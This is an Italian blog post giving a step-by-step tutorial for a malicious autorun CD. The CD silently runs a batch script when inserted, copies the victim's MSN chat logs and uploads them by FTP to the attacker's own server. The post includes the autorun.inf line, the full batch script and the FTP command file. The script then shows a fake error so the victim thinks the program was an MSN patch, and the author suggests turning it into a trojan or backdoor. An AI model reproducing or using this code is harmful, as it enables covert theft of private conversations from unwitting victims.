Sicurezza Informatica Varie

Il dischetto… maligno

Oggi pomeriggio non sapendo cosa sapere mi sono messo a ricerare dei modi con il quale sia possibile violare la sicurezza di un sistema informatico senza troppi problemi è mi è venuto in mente un metodo divertente, ma da non sottovalutare: utilizzare un cdrom autoeseguibile.

 

…:::Come funziona?:::…

Semplicissimo: dopo aver inserito il cdrom contenente il programma maligno, quest’ultimo viene automaticamente eseguito senza richiedere nessuna autorizzazione all’utente.
A questo punto si aprono infinite porte per l’attaccante: possiamo eliminare file, installare trojan, rat, backdoor oppure copiare dei file direttamente su un server ftp.

 

…:::Come fare ciò?:::…

Inanzitutto bisogna procurarsi due file, i quali sono il cuore di tale sistema: autorun.inf e start.exe

Il primo file serve per “comunicare” al computer quale file deve avviare appena inserito il cdrom, invece il file “start.exe” (scaricabile da qui) serve per avviare il software maligno.
Nel file autorun.inf dobbiamo andare a scrivere di avviare prima “start.exe” e poi il programma maligno, per esempio:

 

[autorun] open=start.exe file_maligno.exe

 

Facciamo finta che vogliamo che il nostro script maligno copi tutte le conversazioni del programma MSN: come prima cosa realizziamo una cartella per organizzare le nostre idee, dentro la quale andiamo a creare un file batch con il seguente codice:

 

—————————————————————————

@echo off
md c:\temp
cls
copy upload.txt C:\temp
cls
cd C:\Documents and Settings\%username%\Documenti\Le mie Conversazioni\settembre 2007
cls
copy *.html c:\temp
cls
cd c:\temp
cls
ftp -v -i -s:upload.txt
rd c:\temp
cls
echo “Messaggio d’errore 152245165”;
echo “La versione di MSN in uso non è compatibile con questo script”;
pause

—————————————————————————

 

Come è possibile capire osservando questo semplice codice, copia in una cartella temporanea tutte le conversazioni, per poi uplodarle su un server (in cui i dati di connessione si trovano in un file testuale) e alla fine per non destare sospetti restituisce un messaggio d’errore per far sembrare che il software fosse stata una patch per il software MSN. Diamo a questo file il nome di script.bat

 

Adesso andiamo a creare un file testuale nel quale andremmo a inserire i paramentri per far si che lo script in batch possa uplodare le conversazioni nel nostro spazio ftp, tale file lo andremmo a chiamare upload.txt

 

—————————————————————————

open ftp.[yoursite].it
[your username] [your password] cd logs
! cls
lcd c:\temp
! cls
ascii
! cls
! echo Attendere che venga completato il backup…
mput *.html
!cls
bye
quit

—————————————————————————

 

In questo file testuale è necessario modificare i valori tra parentesi con i propri dati di connessione.

 

Adesso è il momento di impostare il file autorun.inf, quindi metteremo:

 

[autorun] open=start.exe script.bat

 

…:::Masterizziamo!!!:::…

A questo punto possiamo masterizzare il nostro Cd… mettiamo i file autorun.inf, start.exe, script.bat e upload.txt sul cd e avviamo la procedura di masterizzazione.

A scrittura completata appena il nostro cdrom verrà inserito nel computer della nostra vittima verranno uplodate tutte le conversazioni nel nostro spazio web… niente di più semplice.

 

Ovviamente potremmo far si che questo semplice programmi si trasformi in qualcosa di più pericolo, come un trojan, un backdoor o comunque codici maligni.

 

Con questo è tutto anche per oggi… Un salutone!! 😀

Lascia un commento

4 commenti

Prima di continuare, guarda qui!

Hai trovato quello che stavi cercando?
Rimaniamo in contatto, potresti imparare molte cose!

Grazie!

Sono sicuro che insieme potremmo fare molte cose!

FERMO! Prima di uscire, guarda qui!

Hai trovato quello che stavi cercando?
Rimaniamo in contatto, potresti imparare molte cose!

Grazie!

Sono sicuro che insieme potremmo fare molte cose!